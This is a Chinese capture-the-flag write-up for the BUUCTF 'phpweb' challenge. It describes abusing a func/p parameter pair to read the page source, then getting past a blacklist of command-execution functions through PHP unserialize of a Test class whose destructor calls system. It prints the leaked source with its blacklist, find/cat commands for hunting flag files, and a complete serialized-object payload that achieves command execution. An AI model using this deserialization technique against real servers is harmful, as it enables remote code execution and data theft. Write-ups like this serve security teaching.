BUUFTC-日刷-[网鼎杯 2020 朱雀组]phpweb-主动利用反序列化
打开发现耶稣(不是)
抓包
发现传入两个参数,猜测第一个是函数名,第二个是函数的参数。
改成print_ r和test,发包过去
发现成功输出
这里尝试system啥的会提示hacker
尝试输出源码,经过测试,file_get_contents这个函数比较方便看
获得index.php的源码
<?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents"); function gettime($func, $p) { $result = call_user_func($func, $p); $a= gettype($result); if ($a == "string") { return $result; } else {return "";} } class Test { var $p = "Y-m-d h:i:s a"; var $func = "date"; function __destruct() { if ($this->func != "") { echo gettime($this->func, $this->p); } } } $func = $_REQUEST["func"]; $p = $_REQUEST["p"]; if ($func != null) { $func = strtolower($func); if (!in_array($func,$disable_fun)) { echo gettime($func, $p); }else { die("Hacker..."); } } ?>
可以看到黑名单过滤大部分命令执行函数,注意这里有个类原来的逻辑没用,很明显是给我们利用的,类的利用一般就是反序列化了
原逻辑会对函数名进行黑名单检测,对参数没检测
这里让函数为unserialize,参数为类的序列化数据即可,序列化的类来执行system,由于是析构函数执行,因此不需要自己调用,反序列化即可
这里查看根目录会发现没flag,其实在tmp底下,要是这题目实在藏得很深的话
可以用:
system(“find / -name flag*”):查找所有文件名匹配flag*的文件
system(“cat $(find / -name flag*)”):打印所有文件名匹配flag*的文件
最终payload:func=unserialize&p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}